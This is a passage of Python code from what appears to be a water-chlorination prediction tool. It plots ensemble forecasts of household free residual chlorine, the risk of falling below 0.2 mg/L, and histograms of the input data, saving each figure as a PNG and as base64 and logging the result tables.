np.min(results_table_frc_avg_pm, axis=1),
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax2.plot(
test1_frc,
np.max(results_table_frc_avg_pm, axis=1),
"#ffa600",
linewidth=0.5,
)
ax2.plot(
test1_frc,
np.median(results_table_frc_avg_pm, axis=1),
"#ffa600",
linewidth=1,
label="Median Prediction",
)
ax2.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax2.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax2.set_xlim([0.19, 2.0])
ax2.set_xticks(np.arange(0.2, 2.2, 0.2))
ax2.set_xlabel("Tap Stand FRC (mg/L)")
ax2.set_ylabel("Household FRC (mg/L)")
ax2.set_title("Average Case - PM Collection")
ax3.fill_between(
test1_frc,
np.percentile(results_table_frc_worst_am, 97.5, axis=1),
np.percentile(results_table_frc_worst_am, 2.5, axis=1),
facecolor="#b80000",
alpha=0.5,
label="95th Percentile Range",
)
ax3.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax3.plot(
test1_frc,
np.min(results_table_frc_worst_am, axis=1),
"#b80000",
linewidth=0.5,
label="Minimum/Maximum",
)
ax3.plot(
test1_frc,
np.max(results_table_frc_worst_am, axis=1),
"#b80000",
linewidth=0.5,
)
ax3.plot(
test1_frc,
np.median(results_table_frc_worst_am, axis=1),
"#b80000",
linewidth=1,
label="Median Prediction",
)
ax3.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax3.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax3.set_xlim([0.19, 2.0])
ax3.set_xticks(np.arange(0.2, 2.2, 0.2))
ax3.set_xlabel("Tap Stand FRC (mg/L)")
ax3.set_ylabel("Household FRC (mg/L)")
ax3.set_title("Worst Case - AM Collection")
ax4.fill_between(
test1_frc,
np.percentile(results_table_frc_worst_pm, 97.5, axis=1),
np.percentile(results_table_frc_worst_pm, 2.5, axis=1),
facecolor="#b80000",
alpha=0.5,
label="95th Percentile Range",
)
ax4.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax4.plot(
test1_frc,
np.min(results_table_frc_worst_pm, axis=1),
"#b80000",
linewidth=0.5,
label="Minimum/Maximum",
)
ax4.plot(
test1_frc,
np.max(results_table_frc_worst_pm, axis=1),
"#b80000",
linewidth=0.5,
)
ax4.plot(
test1_frc,
np.median(results_table_frc_worst_pm, axis=1),
"#b80000",
linewidth=1,
label="Median Prediction",
)
ax4.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax4.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax4.set_xlim([0.19, 2.0])
ax4.set_xticks(np.arange(0.2, 2.2, 0.2))
ax4.set_xlabel("Tap Stand FRC (mg/L)")
ax4.set_ylabel("Household FRC (mg/L)")
ax4.set_title("Worst Case - PM Collection")
plt.subplots_adjust(wspace=0.25)
plt.savefig(
os.path.splitext(filename)[0] + "_Predictions_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig1.pickle', 'wb'))
StringIOBytes_preds = io.BytesIO()
plt.savefig(StringIOBytes_preds, format="png", bbox_inches="tight")
StringIOBytes_preds.seek(0)
preds_base_64_pngData = base64.b64encode(StringIOBytes_preds.read())
plt.close()
risk_fig = plt.figure(figsize=(6.69, 3.35), dpi=300)
plt.plot(
test1_frc,
np.sum(np.less(results_table_frc_avg_am, 0.20), axis=1)
/ self.network_count,
c="#ffa600",
label="Risk of Household FRC < 0.20 mg/L - Average Case, AM Collection",
)
plt.plot(
test1_frc,
np.sum(np.less(results_table_frc_avg_pm, 0.20), axis=1)
/ self.network_count,
c="#ffa600",
ls="--",
label="Risk of Household FRC < 0.20 mg/L - Average Case, PM Collection",
)
plt.plot(
test1_frc,
np.sum(np.less(results_table_frc_worst_am, 0.2), axis=1)
/ self.network_count,
c="#b80000",
label="Risk of Household FRC < 0.20 mg/L - Worst Case, AM Collection",
)
plt.plot(
test1_frc,
np.sum(np.less(results_table_frc_worst_pm, 0.2), axis=1)
/ self.network_count,
c="#b80000",
ls="--",
label="Risk of Household FRC < 0.20 mg/L - Worst Case, PM Collection",
)
plt.xlim([0.2, 2])
plt.xlabel("Tapstand FRC (mg/L)")
plt.ylim([0, 1])
plt.ylabel("Risk of Point-of-Consumption FRC < 0.2 mg/L")
plt.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
plt.subplots_adjust(bottom=0.15, right=0.95)
plt.savefig(
os.path.splitext(filename)[0] + "_Risk_Fig.png",
format="png",
bbox_inches="tight",
)
StringIOBytes_risk = io.BytesIO()
plt.savefig(StringIOBytes_risk, format="png", bbox_inches="tight")
StringIOBytes_risk.seek(0)
risk_base_64_pngData = base64.b64encode(StringIOBytes_risk.read())
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig2.pickle', 'wb'))
plt.close()
elif self.post_process_check == True:
preds_fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(
2, 2, figsize=(6.69, 6.69), dpi=300
)
ax1.fill_between(
test1_frc,
self.avg_case_results_am_post["Upper 95 CI"],
self.avg_case_results_am_post["Lower 95 CI"],
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax1.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax1.plot(
test1_frc,
self.avg_case_results_am_post["Ensemble Minimum"],
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax1.plot(
test1_frc,
self.avg_case_results_am_post["Ensemble Maximum"],
"#ffa600",
linewidth=0.5,
)
ax1.plot(
test1_frc,
self.avg_case_results_am_post["median"],
"#ffa600",
linewidth=1,
label="Median Prediction",
)
ax1.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax1.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax1.set_xlim([0.19, 2.0])
ax1.set_xticks(np.arange(0.2, 2.2, 0.2))
ax1.set_xlabel("Tap Stand FRC (mg/L)")
ax1.set_ylabel("Household FRC (mg/L)")
ax1.set_title("Average Case - AM Collection")
ax2.fill_between(
test1_frc,
self.avg_case_results_pm_post["Upper 95 CI"],
self.avg_case_results_pm_post["Lower 95 CI"],
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax2.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax2.plot(
test1_frc,
self.avg_case_results_pm_post["Ensemble Minimum"],
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax2.plot(
test1_frc,
self.avg_case_results_pm_post["Ensemble Maximum"],
"#ffa600",
linewidth=0.5,
)
ax2.plot(
test1_frc,
self.avg_case_results_pm_post["median"],
"#ffa600",
linewidth=1,
label="median Prediction",
)
ax2.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax2.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax2.set_xlim([0.19, 2.0])
ax2.set_xticks(np.arange(0.2, 2.2, 0.2))
ax2.set_xlabel("Tap Stand FRC (mg/L)")
ax2.set_ylabel("Household FRC (mg/L)")
ax2.set_title("Average Case - PM Collection")
ax3.fill_between(
test1_frc,
self.worst_case_results_am_post["Upper 95 CI"],
self.worst_case_results_am_post["Lower 95 CI"],
facecolor="#b80000",
alpha=0.5,
label="95th Percentile Range",
)
ax3.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax3.plot(
test1_frc,
self.worst_case_results_am_post["Ensemble Minimum"],
"#b80000",
linewidth=0.5,
label="Minimum/Maximum",
)
ax3.plot(
test1_frc,
self.worst_case_results_am_post["Ensemble Maximum"],
"#b80000",
linewidth=0.5,
)
ax3.plot(
test1_frc,
self.worst_case_results_am_post["median"],
"#b80000",
linewidth=1,
label="Median Prediction",
)
ax3.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax3.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax3.set_xlim([0.19, 2.0])
ax3.set_xticks(np.arange(0.2, 2.2, 0.2))
ax3.set_xlabel("Tap Stand FRC (mg/L)")
ax3.set_ylabel("Household FRC (mg/L)")
ax3.set_title("Worst Case - AM Collection")
ax4.fill_between(
test1_frc,
self.worst_case_results_pm_post["Upper 95 CI"],
self.worst_case_results_pm_post["Lower 95 CI"],
facecolor="#b80000",
alpha=0.5,
label="95th Percentile Range",
)
ax4.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax4.plot(
test1_frc,
self.worst_case_results_pm_post["Ensemble Minimum"],
"#b80000",
linewidth=0.5,
label="Minimum/Maximum",
)
ax4.plot(
test1_frc,
self.worst_case_results_pm_post["Ensemble Maximum"],
"#b80000",
linewidth=0.5,
)
ax4.plot(
test1_frc,
self.worst_case_results_pm_post["median"],
"#b80000",
linewidth=1,
label="Median Prediction",
)
ax4.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax4.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax4.set_xlim([0.19, 2.0])
ax4.set_xticks(np.arange(0.2, 2.2, 0.2))
ax4.set_xlabel("Tap Stand FRC (mg/L)")
ax4.set_ylabel("Household FRC (mg/L)")
ax4.set_title("Worst Case - PM Collection")
plt.subplots_adjust(wspace=0.25)
plt.savefig(
os.path.splitext(filename)[0] + "_Predictions_Fig.png",
format="png",
bbox_inches="tight",
)
StringIOBytes_preds = io.BytesIO()
plt.savefig(StringIOBytes_preds, format="png", bbox_inches="tight")
StringIOBytes_preds.seek(0)
preds_base_64_pngData = base64.b64encode(StringIOBytes_preds.read())
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig1.pickle', 'wb'))
plt.close()
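# Risk figure: predicted probability of household FRC falling below 0.2 mg/L versus tapstand FRC for all four scenario/collection-time combinations.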
risk_fig = plt.figure(figsize=(6.69, 3.35), dpi=300)
plt.plot(
test1_frc,
self.avg_case_results_am_post["probability<=0.20"],
c="#ffa600",
label="Risk of Household FRC < 0.20 mg/L - Average Case, AM Collection",
)
plt.plot(
test1_frc,
self.avg_case_results_pm_post["probability<=0.20"],
c="#ffa600",
ls="--",
label="Risk of Household FRC < 0.20 mg/L - Average Case, PM Collection",
)
plt.plot(
test1_frc,
self.worst_case_results_am_post["probability<=0.20"],
c="#b80000",
label="Risk of Household FRC < 0.20 mg/L - Worst Case, AM Collection",
)
plt.plot(
test1_frc,
self.worst_case_results_pm_post["probability<=0.20"],
c="#b80000",
ls="--",
label="Risk of Household FRC < 0.20 mg/L - Worst Case, PM Collection",
)
plt.xlim([0.2, 2])
plt.xlabel("Tapstand FRC (mg/L)")
plt.ylim([0, 1])
plt.ylabel("Risk of Point-of-Consumption FRC < 0.2 mg/L")
plt.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
plt.savefig(
os.path.splitext(filename)[0] + "_Risk_Fig.png",
format="png",
bbox_inches="tight",
)
StringIOBytes_risk = io.BytesIO()
plt.savefig(StringIOBytes_risk, format="png", bbox_inches="tight")
StringIOBytes_risk.seek(0)
risk_base_64_pngData = base64.b64encode(StringIOBytes_risk.read())
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig2.pickle', 'wb'))
plt.close()
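# Input histograms: the subplot layout depends on which optional columns (water temperature, conductivity) are present in the input data.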
if WATTEMP in self.datainputs.columns and COND in self.datainputs.columns:
hist_fig, (ax1, ax2, ax3, ax4, ax5, ax6) = plt.subplots(
6, 1, figsize=(3.35, 6.69), dpi=300
)
ax1.set_ylabel("Frequency")
ax1.set_xlabel("Tapstand FRC (mg/L)")
ax1.hist(self.datainputs.iloc[:, 0], bins=30, color="grey")
ax2.set_ylabel("Frequency")
ax2.set_xlabel("Elapsed Time (hours)")
ax2.hist(self.datainputs.iloc[:, 1], bins=30, color="grey")
ax3.set_ylabel("Frequency")
ax3.set_xlabel("Collection Time (0=AM, 1=PM)")
ax3.hist(self.datainputs.iloc[:, 2], bins=30, color="grey")
ax4.set_ylabel("Frequency")
ax4.set_xlabel("Water Temperature(" + r"$\degree$" + "C)")
ax4.hist(self.datainputs.iloc[:, 3], bins=30, color="grey")
ax4.axvline(
self.median_wattemp,
c="#ffa600",
ls="--",
label="Average Case Value Used",
)
ax4.axvline(
self.upper95_wattemp,
c="#b80000",
ls="--",
label="Worst Case Value Used",
)
ax4.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
ax5.set_ylabel("Frequency")
ax5.set_xlabel("Electrical Conductivity (" + r"$\mu$" + "s/cm)")
ax5.hist(self.datainputs.iloc[:, 4], bins=30, color="grey")
ax5.axvline(
self.median_cond,
c="#ffa600",
ls="--",
label="Average Case Value Used",
)
ax5.axvline(
self.upper95_cond,
c="#b80000",
ls="--",
label="Worst Case Value used",
)
ax5.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
ax6.set_ylabel("Frequency")
ax6.set_xlabel("Household FRC (mg/L)")
ax6.hist(self.dataoutputs, bins=30, color="grey")
plt.subplots_adjust(
left=0.18, hspace=0.60, top=0.99, bottom=0.075, right=0.98
)
plt.savefig(
os.path.splitext(filename)[0] + "_Histograms_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig3.pickle', 'wb'))
StringIOBytes_histogram = io.BytesIO()
plt.savefig(StringIOBytes_histogram, format="png", bbox_inches="tight")
StringIOBytes_histogram.seek(0)
hist_base_64_pngData = base64.b64encode(StringIOBytes_histogram.read())
# Close only after the in-memory save; calling plt.close() first would leave an empty canvas to encode.
plt.close()
elif WATTEMP in self.datainputs.columns:
hist_fig, (ax1, ax2, ax3, ax4, ax5) = plt.subplots(
5, 1, figsize=(3.35, 6.69), dpi=300
)
ax1.set_ylabel("Frequency")
ax1.set_xlabel("Tapstand FRC (mg/L)")
ax1.hist(self.datainputs.iloc[:, 0], bins=30, color="grey")
ax2.set_ylabel("Frequency")
ax2.set_xlabel("Elapsed Time (hours)")
ax2.hist(self.datainputs.iloc[:, 1], bins=30, color="grey")
ax3.set_ylabel("Frequency")
ax3.set_xlabel("Collection Time (0=AM, 1=PM)")
ax3.hist(self.datainputs.iloc[:, 2], bins=30, color="grey")
ax4.set_ylabel("Frequency")
ax4.set_xlabel("Water Temperature(" + r"$\degree$" + "C)")
ax4.hist(self.datainputs.iloc[:, 3], bins=30, color="grey")
ax4.axvline(
self.median_wattemp,
c="#ffa600",
ls="--",
label="Average Case Value Used",
)
ax4.axvline(
self.upper95_wattemp,
c="#b80000",
ls="--",
label="Worst Case Value Used",
)
ax4.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
ax5.set_ylabel("Frequency")
ax5.set_xlabel("Household FRC (mg/L)")
ax5.hist(self.dataoutputs, bins=30, color="grey")
plt.subplots_adjust(
left=0.18, hspace=0.60, top=0.99, bottom=0.075, right=0.98
)
plt.savefig(
os.path.splitext(filename)[0] + "_Histograms_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig3.pickle', 'wb'))
StringIOBytes_histogram = io.BytesIO()
plt.savefig(StringIOBytes_histogram, format="png", bbox_inches="tight")
StringIOBytes_histogram.seek(0)
hist_base_64_pngData = base64.b64encode(StringIOBytes_histogram.read())
# Close only after the in-memory save; calling plt.close() first would leave an empty canvas to encode.
plt.close()
elif COND in self.datainputs.columns:
hist_fig, (ax1, ax2, ax3, ax4, ax5) = plt.subplots(
5, 1, figsize=(3.35, 6.69), dpi=300
)
ax1.set_ylabel("Frequency")
ax1.set_xlabel("Tapstand FRC (mg/L)")
ax1.hist(self.datainputs.iloc[:, 0], bins=30, color="grey")
ax2.set_ylabel("Frequency")
ax2.set_xlabel("Elapsed Time (hours)")
ax2.hist(self.datainputs.iloc[:, 1], bins=30, color="grey")
ax3.set_ylabel("Frequency")
ax3.set_xlabel("Collection Time (0=AM, 1=PM)")
ax3.hist(self.datainputs.iloc[:, 2], bins=30, color="grey")
ax4.set_ylabel("Frequency")
ax4.set_xlabel("Electrical Conductivity (" + r"$\mu$" + "s/cm)")
ax4.hist(self.datainputs.iloc[:, 4], bins=30, color="grey")
ax4.axvline(
self.median_cond,
c="#ffa600",
ls="--",
label="Average Case Value Used",
)
ax4.axvline(
self.upper95_cond,
c="#b80000",
ls="--",
label="Worst Case Value used",
)
ax4.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
ax5.set_ylabel("Frequency")
ax5.set_xlabel("Household FRC (mg/L)")
ax5.hist(self.dataoutputs, bins=30, color="grey")
plt.subplots_adjust(
left=0.18, hspace=0.60, top=0.99, bottom=0.075, right=0.98
)
plt.savefig(
os.path.splitext(filename)[0] + "_Histograms_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig3.pickle', 'wb'))
StringIOBytes_histogram = io.BytesIO()
plt.savefig(StringIOBytes_histogram, format="png", bbox_inches="tight")
StringIOBytes_histogram.seek(0)
hist_base_64_pngData = base64.b64encode(StringIOBytes_histogram.read())
# Close only after the in-memory save; calling plt.close() first would leave an empty canvas to encode.
plt.close()
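# Neither water temperature nor conductivity was provided, so only the average-case AM/PM predictions are plotted below.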
else:
if self.post_process_check == False:
results_table_frc_avg_am = self.avg_case_results_am.iloc[
:, 0 : (self.network_count - 1)
]
results_table_frc_avg_pm = self.avg_case_results_pm.iloc[
:, 0 : (self.network_count - 1)
]
preds_fig, (ax1, ax2) = plt.subplots(
1, 2, figsize=(6.69, 3.35), dpi=300
)
ax1.fill_between(
test1_frc,
np.percentile(results_table_frc_avg_am, 97.5, axis=1),
np.percentile(results_table_frc_avg_am, 2.5, axis=1),
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax1.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax1.plot(
test1_frc,
np.min(results_table_frc_avg_am, axis=1),
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax1.plot(
test1_frc,
np.max(results_table_frc_avg_am, axis=1),
"#ffa600",
linewidth=0.5,
)
ax1.plot(
test1_frc,
np.median(results_table_frc_avg_am, axis=1),
"#ffa600",
linewidth=1,
label="Median Prediction",
)
ax1.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax1.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax1.set_xlim([0.19, 2.0])
ax1.set_xticks(np.arange(0.2, 2.2, 0.2))
ax1.set_xlabel("Tap Stand FRC (mg/L)")
ax1.set_ylabel("Household FRC (mg/L)")
ax1.set_title("AM Collection")
ax2.fill_between(
test1_frc,
np.percentile(results_table_frc_avg_pm, 97.5, axis=1),
np.percentile(results_table_frc_avg_pm, 2.5, axis=1),
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax2.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax2.plot(
test1_frc,
np.min(results_table_frc_avg_pm, axis=1),
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax2.plot(
test1_frc,
np.max(results_table_frc_avg_pm, axis=1),
"#ffa600",
linewidth=0.5,
)
ax2.plot(
test1_frc,
np.median(results_table_frc_avg_pm, axis=1),
"#ffa600",
linewidth=1,
label="Median Prediction",
)
ax2.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax2.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax2.set_xlim([0.19, 2.0])
ax2.set_xticks(np.arange(0.2, 2.2, 0.2))
ax2.set_xlabel("Tap Stand FRC (mg/L)")
ax2.set_ylabel("Household FRC (mg/L)")
ax2.set_title("PM Collection")
plt.subplots_adjust(wspace=0.25)
plt.savefig(
os.path.splitext(filename)[0] + "_Predictions_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig1.pickle', 'wb'))
StringIOBytes_preds = io.BytesIO()
plt.savefig(StringIOBytes_preds, format="png", bbox_inches="tight")
StringIOBytes_preds.seek(0)
preds_base_64_pngData = base64.b64encode(StringIOBytes_preds.read())
plt.close()
risk_fig = plt.figure(figsize=(6.69, 3.35), dpi=300)
plt.plot(
test1_frc,
np.sum(np.less(results_table_frc_avg_am, 0.20), axis=1)
/ self.network_count,
c="#ffa600",
label="Risk of Household FRC < 0.20 mg/L - Average Case, AM Collection",
)
plt.plot(
test1_frc,
np.sum(np.less(results_table_frc_avg_pm, 0.20), axis=1)
/ self.network_count,
c="#ffa600",
ls="--",
label="Risk of Household FRC < 0.20 mg/L - Average Case, PM Collection",
)
plt.xlim([0.2, 2])
plt.xlabel("Tapstand FRC (mg/L)")
plt.ylim([0, 1])
plt.ylabel("Risk of Point-of-Consumption FRC < 0.2 mg/L")
plt.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
plt.subplots_adjust(bottom=0.15, right=0.95)
plt.savefig(
os.path.splitext(filename)[0] + "_Risk_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig2.pickle', 'wb'))
StringIOBytes_risk = io.BytesIO()
plt.savefig(StringIOBytes_risk, format="png", bbox_inches="tight")
StringIOBytes_risk.seek(0)
risk_base_64_pngData = base64.b64encode(StringIOBytes_risk.read())
plt.close()
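# Post-processed ensemble: plot the pre-computed summary columns (confidence intervals, median, exceedance probability) instead of recomputing percentiles from the raw member forecasts.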
elif self.post_process_check == True:
preds_fig, (ax1, ax2) = plt.subplots(
1, 2, figsize=(6.69, 3.35), dpi=300
)
ax1.fill_between(
test1_frc,
self.avg_case_results_am_post["Upper 95 CI"],
self.avg_case_results_am_post["Lower 95 CI"],
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax1.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax1.plot(
test1_frc,
self.avg_case_results_am_post["Ensemble Minimum"],
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax1.plot(
test1_frc,
self.avg_case_results_am_post["Ensemble Maximum"],
"#ffa600",
linewidth=0.5,
)
ax1.plot(
test1_frc,
self.avg_case_results_am_post["median"],
"#ffa600",
linewidth=1,
label="Median Prediction",
)
ax1.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax1.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax1.set_xlim([0.19, 2.0])
ax1.set_xticks(np.arange(0.2, 2.2, 0.2))
ax1.set_xlabel("Tap Stand FRC (mg/L)")
ax1.set_ylabel("Household FRC (mg/L)")
ax1.set_title("AM Collection")
ax2.fill_between(
test1_frc,
self.avg_case_results_pm_post["Upper 95 CI"],
self.avg_case_results_pm_post["Lower 95 CI"],
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax2.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax2.plot(
test1_frc,
self.avg_case_results_pm_post["Ensemble Minimum"],
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax2.plot(
test1_frc,
self.avg_case_results_pm_post["Ensemble Maximum"],
"#ffa600",
linewidth=0.5,
)
ax2.plot(
test1_frc,
self.avg_case_results_pm_post["median"],
"#ffa600",
linewidth=1,
label="median Prediction",
)
ax2.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax2.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax2.set_xlim([0.19, 2.0])
ax2.set_xticks(np.arange(0.2, 2.2, 0.2))
ax2.set_xlabel("Tap Stand FRC (mg/L)")
ax2.set_ylabel("Household FRC (mg/L)")
ax2.set_title("PM Collection")
plt.subplots_adjust(wspace=0.25)
plt.tight_layout()
plt.savefig(
os.path.splitext(filename)[0] + "_Predictions_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig1.pickle', 'wb'))
StringIOBytes_preds = io.BytesIO()
plt.savefig(StringIOBytes_preds, format="png", bbox_inches="tight")
StringIOBytes_preds.seek(0)
preds_base_64_pngData = base64.b64encode(StringIOBytes_preds.read())
plt.close()
risk_fig = plt.figure(figsize=(6.69, 3.35), dpi=300)
plt.plot(
test1_frc,
self.avg_case_results_am_post["probability<=0.20"],
c="#ffa600",
label="Risk of Household FRC < 0.20 mg/L - Average Case, AM Collection",
)
plt.plot(
test1_frc,
self.avg_case_results_pm_post["probability<=0.20"],
c="#ffa600",
ls="--",
label="Risk of Household FRC < 0.20 mg/L - Average Case, PM Collection",
)
plt.xlim([0.2, 2])
plt.xlabel("Tapstand FRC (mg/L)")
plt.ylim([0, 1])
plt.ylabel("Risk of Point-of-Consumption FRC < 0.2 mg/L")
plt.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
plt.savefig(
os.path.splitext(filename)[0] + "_Risk_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig2.pickle', 'wb'))
StringIOBytes_risk = io.BytesIO()
plt.savefig(StringIOBytes_risk, format="png", bbox_inches="tight")
StringIOBytes_risk.seek(0)
risk_base_64_pngData = base64.b64encode(StringIOBytes_risk.read())
plt.close()
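# Four-panel input histogram for the reduced feature set (tapstand FRC, elapsed time, collection time, household FRC).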
hist_fig, (ax1, ax2, ax3, ax4) = plt.subplots(
4, 1, figsize=(3.35, 6.69), dpi=300
)
ax1.set_ylabel("Frequency")
ax1.set_xlabel("Tapstand FRC (mg/L)")
ax1.hist(self.datainputs.iloc[:, 0], bins=30, color="grey")
ax2.set_ylabel("Frequency")
ax2.set_xlabel("Elapsed Time (hours)")
ax2.hist(self.datainputs.iloc[:, 1], bins=30, color="grey")
ax3.set_ylabel("Frequency")
ax3.set_xlabel("Collection Time (0=AM, 1=PM)")
ax3.hist(self.datainputs.iloc[:, 2], bins=30, color="grey")
ax4.set_ylabel("Frequency")
ax4.set_xlabel("Household FRC (mg/L)")
ax4.hist(self.dataoutputs, bins=30, color="grey")
plt.subplots_adjust(
left=0.18, hspace=0.60, top=0.99, bottom=0.075, right=0.98
)
plt.savefig(
os.path.splitext(filename)[0] + "_Histograms_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig3.pickle', 'wb'))
StringIOBytes_histogram = io.BytesIO()
plt.savefig(StringIOBytes_histogram, format="png", bbox_inches="tight")
StringIOBytes_histogram.seek(0)
hist_base_64_pngData = base64.b64encode(StringIOBytes_histogram.read())
# Close only after the in-memory save; calling plt.close() first would leave an empty canvas to encode.
plt.close()
return hist_base_64_pngData, risk_base_64_pngData, preds_base_64_pngData
def display_results(self):
"""
Display the results of the predictions as a console output.
Display and return all the contents of the self.results variable which is a pandas Dataframe object
:return: A Pandas Dataframe object (self.results) containing all the result of the predictions
"""
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
if self.post_process_check == False:
logging.info(self.avg_case_results_am)
logging.info(self.worst_case_results_am)
logging.info(self.avg_case_results_pm)
logging.info(self.worst_case_results_pm)
return self.avg_case_results_am, self.avg_case_results_pm, self.worst_case_results_am, self.worst_case_results_pm
else:
logging.info(self.avg_case_results_am_post)
logging.info(self.worst_case_results_am_post)
logging.info(self.avg_case_results_pm_post)
logging.info(self.worst_case_results_pm_post)
return self.avg_case_results_am_post, self.avg_case_results_pm_post, self.worst_case_results_am_post, self.worst_case_results_pm_post
else:
if self.post_process_check == False:
logging.info(self.avg_case_results_am)
logging.info(self.avg_case_results_pm)
return self.avg_case_results_am, self.avg_case_results_pm
else:
logging.info(self.avg_case_results_am_post)
logging.info(self.avg_case_results_pm_post)
return self.avg_case_results_am_post, self.avg_case_results_pm_post
def export_results_to_csv(self, filename):
